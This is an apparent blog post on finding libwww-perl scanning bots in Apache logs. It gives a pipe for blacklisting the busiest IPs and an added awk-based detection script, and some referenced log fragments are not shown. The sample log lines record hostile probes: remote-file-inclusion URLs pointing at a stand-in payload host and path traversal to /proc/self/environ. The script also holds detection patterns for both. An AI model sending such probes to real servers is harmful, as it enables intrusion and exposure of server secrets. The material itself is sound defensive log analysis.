Recently the number of "strange" access records in web logs jumped, and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I found manually:
One thing these records have in common is the use of libwww-perl. Grepping for the string libwww gives a more complete picture.
Extracting the IP addresses gives you a first draft of a "blacklist", and the top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe, which can be made into a function or shell script:
grep libwww "$1" | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -n 12 > "$1.dirty"
Below are the results of processing the list above:
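A field-aware version of the pipe above, as an added example that is not part of the original page. Plain `grep libwww` also counts Lynx (whose User-Agent contains libwww-FM) and any URL or referrer containing the string, so this version matches only the User-Agent field and tallies, per address, requests whose parameters carry a remote URL or a ../ sequence. The function names and the sample log lines, with their addresses and host names, are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original page. All log lines below are
# constructed: documentation address ranges and .invalid host names.

# The pipe from the text, reading the log on stdin (kept for comparison).
naive_dirty_dozen() {
    grep libwww | cut -d' ' -f1 | sort | uniq -c | sort -rn | head -n "${1:-12}"
}

# scanner_report [N]: reads an Apache combined-format log on stdin and prints
# "hits rfi traversal ip" for the N busiest libwww-perl clients.
scanner_report() {
    awk -F'"' '
        # Split on double quotes: $1 = "ip ident user [time] ", $2 = request
        # line, $(NF-1) = User-Agent (the last quoted field).
        NF >= 7 && $(NF-1) ~ /^libwww-perl\// {
            split($1, head, " "); ip = head[1]
            split($2, req, " ");  target = tolower(req[2])
            hits[ip]++
            # A parameter whose value is itself a URL: remote-include probe.
            if (target ~ /[?&][^=&]*=(https?|ftp):\/\//) rfi[ip]++
            # Literal or percent-encoded ../ : path-traversal probe.
            if (target ~ /\.\.\/|%2e%2e/) trav[ip]++
        }
        END {
            for (ip in hits)
                printf "%d %d %d %s\n", hits[ip], rfi[ip], trav[ip], ip
        }
    ' | sort -k1,1nr -k4,4 | head -n "${1:-12}"
}

# Constructed sample: three libwww-perl clients, one Lynx hit, and one
# browser request for a URL that merely contains the string "libwww".
sample_log() {
cat <<'EOF'
192.0.2.10 - - [16/Aug/2010:06:51:08 -0600] "GET /skin/notice.php?skin_path=http://payload.example.invalid/a.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
192.0.2.10 - - [16/Aug/2010:06:51:08 -0600] "GET /400.shtml?skin_path=http://payload.example.invalid/a.txt%3f%3f%3f HTTP/1.1" 500 756 "-" "libwww-perl/5.831"
192.0.2.10 - - [16/Aug/2010:06:51:09 -0600] "GET /shop/skin/notice.php?skin_path=http://payload.example.invalid/a.txt??? HTTP/1.1" 302 820 "-" "libwww-perl/5.831"
198.51.100.7 - - [16/Aug/2010:07:41:39 -0600] "GET /index.php?option=com_content&cfg_path=../../../../proc/self/environ%00 HTTP/1.1" 302 1046 "-" "libwww-perl/5.805"
198.51.100.7 - - [16/Aug/2010:07:41:39 -0600] "GET /400.shtml?option=com_content&cfg_path=../../../../proc/self/environ%2500 HTTP/1.1" 500 756 "-" "libwww-perl/5.805"
203.0.113.5 - - [16/Aug/2010:08:08:36 -0600] "GET /Tools/tr.shtml HTTP/1.0" 500 761 "-" "Lynx/2.8.5rel.1 libwww-FM/2.14FM SSL-MM/1.4.1 OpenSSL/0.9.7d-dev"
203.0.113.9 - - [16/Aug/2010:08:10:02 -0600] "GET /docs/libwww-perl.shtml HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [16/Aug/2010:08:03:41 -0600] "GET /Social/page.shtml HTTP/1.1" 500 811 "-" "libwww-perl/5.813"
EOF
}

# Demo: field-aware report over the constructed sample.
sample_log | scanner_report
```

On the sample, the original pipe lists five addresses, including the Lynx user and the browser, while `scanner_report` lists only the three libwww-perl clients.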
Scanning attempts for November, 2009